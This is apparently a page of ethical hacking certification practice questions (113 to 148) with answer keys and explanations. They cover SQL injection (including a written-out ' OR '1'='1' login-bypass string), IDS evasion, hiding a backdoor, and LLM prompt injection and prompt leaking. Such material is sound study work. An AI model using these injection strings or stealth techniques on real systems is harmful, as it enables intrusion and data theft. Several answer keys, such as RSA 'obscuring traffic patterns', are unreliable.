  113. Question 113 of 148During a red team engagement targeting a custom web application, a tester observes that the app takes a numeric id parameter from the URL and dynamically builds SQL queries. Suspecting SQL injection, the tester sends a crafted HTTP GET request like: Shortly after, the application throws database errors, and the team confirms that the users table has been removed from the backend database. Based on this behavior, which SQL injection method was most likely used? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. The attacker executed a second malicious query alongside the first.

    The most likely method is executing a second query, as deleting a table like 'users' requires a separate SQL command appended to the original query, not just error exploitation.

  114. Question 114 of 148As a cybersecurity analyst at a renowned software corporation, you've noticed some peculiar activity. The company's internal network has seen a sudden increase in redundant network traffic and system crashes. Initial scans have found that most affected systems run a particular version of the operating system, and the identified malicious code seems to be self-replicating and spreading across the network autonomously. Considering the following malware types, which would you identify as the probable cause of this anomalous behavior? Furthermore, how would you prioritize your response to counteract this malware threat and alleviate the system disruptions?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Worm: Quarantine the affected systems, perform an immediate network-wide sweep with the latest antivirus definitions, and update the operating system on all network systems.

    A worm is the probable cause because it self-replicates and spreads autonomously over the network, which matches the described behavior of increased traffic and system crashes.

  115. Question 115 of 148You are conducting a vulnerability assessment in a segmented internal network. When scanning a set of IPs using the nbtscan tool, you discover multiple devices responding with NetBIOS names, but only one of them has the <1B> entry in its response. What does this indicate about that specific host?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. It is the domain master browser or Primary Domain Controller (PDC).

    This is a strong question for legacy network enumeration, testing knowledge of NetBIOS roles. The <1B> entry is a classic exam cue for identifying the PDC or domain master browser.

  116. Question 116 of 148A large chemical plant uses operational technology (OT) networks to control its industrial processes. Recently, security personnel noticed abnormal behavior from critical Programmable Logic Controllers (PLCs), suspecting a stealthy compromise via malicious firmware. Which action should the team take first to effectively verify and neutralize this issue?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Perform detailed inspections of device software for hidden, unauthorized modifications.

    This question accurately tests OT security incident response, focusing on verifying firmware compromise. The correct answer prioritizes verification before containment, a crucial exam principle.

  117. Question 117 of 148During a penetration test on a legacy Windows network, you use the nbtstat -A <IP> command on a target system and retrieve several NetBIOS names, including entries ending with <20> and <03>. However, attempts to list shared folders fail. Which of the following best explains this behavior?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. File and printer sharing is disabled on the target system.

    This is a solid question for legacy Windows network assessment, testing understanding of NetBIOS service dependencies. The failure to enumerate shares is a key cue that file sharing is disabled.

  118. Question 118 of 148You are a cybersecurity consultant at a large healthcare organization. As part of your responsibilities, you are tasked with making sure the company's systems are secure from various attacks. Recently, you've noticed some unusual traffic patterns that suggest someone might be trying to evade the company's Intrusion Detection System (IDS). Which of the following techniques would most likely be used by an attacker in an attempt to evade detection by the IDS?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. The attacker splits malicious data packets into smaller segments to avoid detection.

    This effectively tests IDS evasion techniques, a core intrusion detection skill. Packet fragmentation is a classic method to bypass signature-based detection systems.

  119. Question 119 of 148In a recent penetration testing assignment, you were able to breach a server's web service and install a backdoor. Your aim is to maintain access for as long as possible without getting detected. Considering the web server countermeasures explained earlier, which of the following actions would make your backdoor most likely to remain undetected? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Install the backdoor on a non-web file referenced in a URL.

    Placing the backdoor on a non-web file avoids typical web monitoring tools, increasing stealth. Option C is a trap because updating the file would likely expose the backdoor.

  120. Question 120 of 148Your role as a network administrator in a mid-sized company involves protecting the company's web servers from potential security threats. Recently, your company's web server experienced a Distributed Denial of Service (DDoS) attack. In explaining the situation to your team, you mention the attack specifically targeted the web server's application layer. Which type of DDoS attack was most likely used against your company's web server?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. HTTP flood attack

    HTTP floods target the application layer by overwhelming the server with requests. Options A, C, and D are network/transport layer attacks, not application layer.

  121. Question 121 of 148A tester evaluates a login form that constructs SQL queries using unsanitized user input. By submitting ' OR '1'='1'; –, the tester gains unauthorized access to the application. What type of SQL injection has occurred?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Tautology-based SQL injection

    Tautology-based SQL injection works because the injected condition '1=1' is always true, bypassing authentication. Option B is a trap because it involves UNION queries.

  122. Question 122 of 148A red team operator is assessing the resilience of a corporate network's authentication infrastructure. They input valid usernames with specifically structured guesses based on prior intel about naming conventions, such as birthdates or favorite sports teams. The guesses are tailored and automated with logic-based iterations. Which technique best describes this targeted approach?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Strategic pattern-based input using known logic.

    Strategic pattern-based input uses logic-based guesses like birthdates or sports teams. Option D is a trap because it lacks the strategic element.

  123. Question 123 of 148A cloud provider faced a situation where one customer's malicious activity affected the organization's reputation and service delivery. Which security control would have most effectively prevented this issue?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Assessing multi-tenant isolation techniques

    Multi-tenant isolation prevents one customer's malicious activity from affecting others. Option A is a trap because logging doesn't stop cross-tenant issues.

  124. Question 124 of 148A multinational corporation relies heavily on remote access for its employees to connect to internal systems and resources. Recently, there have been reports of unauthorized access to sensitive company data, leading to concerns about potential session hijacking attacks. The security team is tasked with identifying the specific techniques used by attackers and implementing measures to enhance session security. Considering the scenario described, which advanced session hijacking technique, resembling a scenario-based attack, poses the greatest challenge for the security team to detect and mitigate effectively, potentially compromising the confidentiality of corporate data?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Session Sidejacking Intercepting Unencrypted Session Tokens over Public Wi-Fi Networks

    Session sidejacking exploits unencrypted tokens on public networks. This is highly effective and hard to detect without proper encryption protocols.

  125. Question 125 of 148A multinational corporation recently survived a severe Distributed Denial-of-Service (DDoS) attack, which caused significant downtime and resulted in substantial financial losses. After implementing enhanced security measures, the company contracted you as a cybersecurity consultant to assess their new infrastructure. During the audit, you discovered that the organization uses both hardware and cloud-based solutions to distribute incoming traffic. The primary purpose of these solutions is to absorb and mitigate the effects of a DDoS attack, ensuring that legitimate requests are not affected during such an event. What type of DDoS mitigation strategy is the company utilizing?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Load Balancing: This approach distributes network or application traffic across many resources to optimize resource use, minimize latency, and maximize throughput. This is consistent with the company's strategy of distributing incoming traffic.

    Load balancing distributes traffic across servers, which absorbs and mitigates DDoS attacks. Blackhole routing drops all traffic, which is not the described strategy.

  126. Question 126 of 148You are a cybersecurity analyst at a tech startup that provides cloud-based services to its clients. Recently, your team detected suspicious activity on one of your critical servers. After further investigation, you discovered an unauthorized user gained escalated privileges and is attempting to perform malicious actions. Your task is to thwart the attack and secure the system from future exploits. Considering the potential consequences and complex nature of the situation, which of the following actions would you take first to immediately contain the threat without causing significant disruption to your services?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Analyze and document the activities of the unauthorized user in real-time, then use this data to implement immediate countermeasures and isolate the affected server from the network.

    Analyzing and documenting attacker activities first ensures informed containment. This prioritizes live threat response over scanning or forensics, avoiding disruption.

  127. Question 127 of 148You are a security analyst for a medium-sized e-commerce company. Recently, the company has been suffering from repeated incidents of session hijacking. To prevent future incidents, you've been asked to suggest a robust strategy to mitigate this risk. Which of the following approaches would you recommend?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Apply an IPsec VPN solution that encrypts the entire IP packet, thereby making session hijacking attempts more difficult.

    IPsec VPN is the correct answer as it encrypts the entire session, making hijacking much harder. While IPS and awareness are good practices, they don't prevent the attack at the transport layer like encryption does.

  128. Question 128 of 148During a cybersecurity operation, a CEH professional discovered an unknown Bluetooth Low Energy (BLE) device actively transmitting pairing signals. The professional decided to breach the BLE device using a crackle. The device was seen pairing and exchanging keys, leading to the establishment of a secure connection. However, the professional only managed to capture LL_ENC_REQ and LL_ENC_RSP packets, but not the Long-Term Key (LTK). Which of the following best describes the professional's next course of action?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. The operation cannot continue without the LTK.

    This is correct because the LTK is essential for BLE decryption. The trap is confusing packet types with exploitable data.

  129. Question 129 of 148A system analyst wants to implement an encryption solution that allows safe key distribution. Which encryption method should the analyst consider?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Asymmetric encryption

    Asymmetric encryption uses public/private keys for secure key exchange without a pre-shared secret. Symmetric encryption requires secure key distribution, while hashing and disk encryption aren't key management solutions.

  130. Question 130 of 148While conducting a thorough reconnaissance operation on a potential threat actor's digital footprint, an ethical hacker working for a cybersecurity firm stumbled upon an interesting discovery. The threat actor appeared to have left a series of digital breadcrumbs across various internet forums and hidden web pages, pointing to a potential future attack strategy. The ethical hacker, wanting to gather as much information as possible about the actor's potential strategy without tipping them off, has to make careful tool and technique choices. Which of the following approaches should the ethical hacker most likely avoid to maintain a low profile and avoid alerting the threat actor?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Directly interacting with the threat actor on the forums using a pseudonym to gain more information about their plans.

    Directly engaging the threat actor is risky because it can expose your identity. Passive tools like Tor, WHOIS, and archives are safer for reconnaissance.

  131. Question 131 of 148You are a new IT intern at a local tech company. The company has a strong focus on cybersecurity and regularly hires ethical hackers to maintain its security posture. You come across the term 'black box testing' in a company document. Uncertain about its meaning, you decide to ask your supervisor. She explains that it refers to a type of testing in cybersecurity. In the context of ethical hacking, what is 'black box testing'?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. It involves the ethical hacker trying to break into a system without any prior knowledge about the system.

    Black box testing simulates a real attacker by providing no prior system knowledge, forcing the ethical hacker to find vulnerabilities through exploration.

  132. Question 132 of 148You have recently joined as a cybersecurity analyst at a multinational corporation. Your role includes regular vulnerability assessments of the company's wide-ranging IT infrastructure. During one of these assessments, you employ the Nessus scanner. The scanner flags a severe vulnerability marked as CVE-2023-12456. This vulnerability specifically targets the SSH (Secure Shell) service running on one of the company's Linux servers. With a CVSS (Common Vulnerability Scoring System) score of 9.0, the vulnerability poses a substantial risk. Most concerning is its ability to allow potential remote code execution. Given the high-risk nature of the vulnerability, as depicted by the CVSS score, and its potential impact, what course of action should be immediately prioritized from the following choices? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Without delay, apply the patch recommended by the vendor. Subsequently, initiate a system-wide reboot during the next downtime scheduled for system maintenance.

    For a severe, high-risk vulnerability like a potential remote code execution, patching immediately is the top priority to close the attack window.

  133. Question 133 of 148While performing a vulnerability assessment for XYZ Corporation, you discover that several key systems are regularly interacting with unidentified external entities. These interactions often involve data transfers, both incoming and outgoing. While some of these might be legitimate, the nature and volume of this unmonitored traffic raise concerns about potential data exfiltration or malware introduction. Given the ambiguous nature of these interactions and the high stakes involved, which strategy would most directly identify and mitigate the vulnerabilities associated with these unsanctioned exchanges?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Prioritize a behavioral analytics solution that profiles normal system behaviors and alerts on deviations, focusing on the interaction patterns of the identified systems.

    Behavioral analytics is the most direct method because it identifies unsanctioned exchanges by profiling normal system interaction patterns and alerting on deviations.

  134. Question 134 of 148You are currently serving as a cybersecurity analyst at a global banking corporation. Your team has recently identified a series of irregular incidents that indicate a potential backdoor attack on the company's intricate network system. Some of these irregularities include a significant rise in outbound network traffic during non-working hours, unexpected and unaccounted system reboots, and strangely modified system files. Your primary focus now is to detect any hidden backdoor in the system, neutralize it, and ensure the overall integrity of the systems involved, while preventing any further security breaches. Given the complexity of the situation and the importance of maintaining the bank's network security, what combination of measures would be most effective in accurately identifying the potential backdoor, neutralizing it, and ensuring the system's security?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Implement strict access control lists (ACLs), ensure regular updates of security patches, and conduct an extensive audit of user accounts and privileges periodically.

    Strict access controls, regular patching, and user account audits are fundamental for neutralizing backdoors and preventing privilege escalation attacks.

  135. Question 135 of 148As an IT professional, you are attending a webinar on cybersecurity. The presenter emphasizes the importance of ethical hacking and the different types of hackers involved in the cyber world. Suddenly, the term "script kiddie" is mentioned, piquing your curiosity. According to the presenter, who are "script kiddies" in the context of ethical hacking? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. They are novices in the hacking world who mainly use scripts and codes developed by others.

    Script kiddies are novice hackers who use pre-existing scripts. Option C is a trap for sophisticated attackers, while D describes skilled developers, not script kiddies.

  136. Question 136 of 148An organization uses SHA-256 for data integrity checks but is still experiencing unauthorized data modification. Which cryptographic tool can help resolve this issue?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Digital signatures

    Digital signatures provide non-repudiation, ensuring data hasn't been tampered with. SHA-256 only verifies hashes but doesn't prove origin or prevent modification.

  137. Question 137 of 148In an IoT environment using the MQTT protocol, an attacker compromises a low-power sensor and starts publishing messages to the 'topic/system/updates' with a 'Retain' flag. What is the impact?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Every new subscriber to that topic will immediately receive the malicious update message.

    MQTT's 'Retain' flag sends the stored message to all new subscribers. The impact is widespread delivery, not automatic TLS, battery drain, or broker crashing.

  138. Question 138 of 148An attacker performs DNS cache snooping using the dig command with the +norecurse flag against a known DNS server. The server returns NOERROR but provides no answer to the query. What does this most likely suggest?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. No client from the DNS server's network has recently accessed the domain.

    A NOERROR but empty answer in DNS cache snooping indicates the domain isn't in the cache. Option A would return the cached record, while B suggests a SERVFAIL error.

  139. Question 139 of 148An attacker gains access to an AWS environment and runs 'aws sts get-caller-identity'. They then attempt to call 'iam:SimulatePrincipalPolicy'. What is their most likely goal?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. To test which permissions their current token has without triggering many 'Access Denied' logs.

    SimulatePrincipalPolicy is a stealthy way to test permissions without logging 'Access Denied' errors. Option A and D are unrelated actions, while C is unlikely.

  140. Question 140 of 148A Certified Ethical Hacker (CEH) is auditing a company's web server that employs virtual hosting. The server hosts multiple domains and uses a web proxy to maintain anonymity and prevent IP blocking. The CEH discovers that the server's document root directory, which stores critical HTML files, is named "certroot" and is stored in the directory /admin/web. The server root, which stores the server's configuration, error, executable, and log files, is also identified. The CEH also notes that the server uses a virtual document tree for additional storage. Given this scenario which of the following actions would most likely increase the security of the web server?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Regularly updating and patching the server software

    Regular patching is the most direct way to address vulnerabilities in any server, regardless of its architecture. This action closes security holes that could be exploited, unlike reorganizing directory structures.

  141. Question 141 of 148You're an IT security analyst at a fast-growing fintech startup. Recently, you've noticed an uptick in network traffic anomalies. You decide to perform a more thorough network scan using the ICMP Echo Request method. During the scan, you notice that a certain set of IPs in your network are not returning any Echo Reply, but other network functionalities seem to be operating normally. How would you interpret this situation?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. The firewall or another security control is probably blocking the ICMP Echo Requests.

    The lack of Echo Replies while other services are normal points to a security control like a firewall blocking the ICMP traffic, which is a common and intentional security measure.

  142. Question 142 of 148A security analyst notices that an LLM-based customer service bot is leaking system prompts and internal API keys when a user provides a specific sequence of malformed inputs. What type of vulnerability is being exploited?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Direct Prompt Injection

    Direct prompt injection is correct because the attacker bypasses the model by injecting malicious input directly into the system prompt, causing it to leak sensitive data.

  143. Question 143 of 148Following an attack on its mobile infrastructure, an e-commerce company is reconsidering its mobile security strategies. In an event where an attacker has been able to gain partial root access to the mobile application, which of these tactics will offer the most effective barrier to additional exploitation?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Leveraging secure coding practices and automated code review processes in the development stage.

    This tests secure development practices for mobile applications. While a good topic, the question could be clearer by specifying 'prevent future' instead of 'barrier to additional' exploitation.

  144. Question 144 of 148As a newly appointed cybersecurity analyst in a financial firm, you are tasked with performing network scanning to maintain the organization's network security posture. You decide to conduct a SYN scan, sometimes referred to as half-open scanning, using a popular tool like Nmap. If you initiate a SYN scan against a target IP address and receive a SYN/ACK packet in response, how would you interpret this result?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. The scanned port on the target IP address is open, as the receipt of a SYN/ACK packet indicates that the port is prepared to establish a connection.

    A SYN/ACK response indicates the port is open and accepting connections. Option A is a trap because it incorrectly describes port closure logic.

  145. Question 145 of 148During an investigation, an ethical hacker discovered that a web application's API has been compromised, leading to unauthorized access and data manipulation. They identified webhooks and a webshell being used by the attacker. To prevent further exploits, which of the following actions should be taken?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Harden the web server security, add multi-factor authentication for API users, and restrict the execution of scripts server-side.

    Hardening the server, MFA, and script restrictions directly prevent webshells and unauthorized access. Option B is a trap because a WAF alone isn't sufficient.

  146. Question 146 of 148You have recently been hired as an entry-level IT technician in a large corporation. In a meeting with the IT team, the terms "ethical hacking" and "penetration testing" are mentioned frequently. Later, a colleague explains to you that the main difference between the two is based on their goals. What is the primary goal of an ethical hacker in comparison to a penetration tester? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. An ethical hacker is primarily focused on securing the system, while a penetration tester tries to exploit the system's vulnerabilities.

    The answer correctly contrasts securing systems (ethical hacker) with exploiting them (penetration tester). However, the wording is slightly vague; ethical hackers also exploit vulnerabilities to secure systems.

  147. Question 147 of 148A hacker uses a 'Prompt Leaking' technique against a corporate LLM to reveal the hidden instructions provided by the developers. Which of the following is a direct consequence of this attack?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Exposure of proprietary business logic or data filtering rules.

    Prompt leaking directly exposes the hidden system instructions, which often include proprietary business logic or data filtering rules that are meant to be confidential.

  148. Question 148 of 148A cybersecurity company wants to prevent attackers from gaining information about its encrypted traffic patterns. Which of the following encryption algorithms should they utilize?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. RSA

    RSA is an asymmetric algorithm that obscures traffic patterns more than symmetric AES, but the question is misleading since all listed algorithms encrypt traffic. The exam expects RSA as the best answer for pattern obscuration, though the premise is weak.

This test also exists as narrated videos — every answer explained out loud:

More free practice tests at certpunch.com and new video rounds on @CertPunch.

Scroll to Top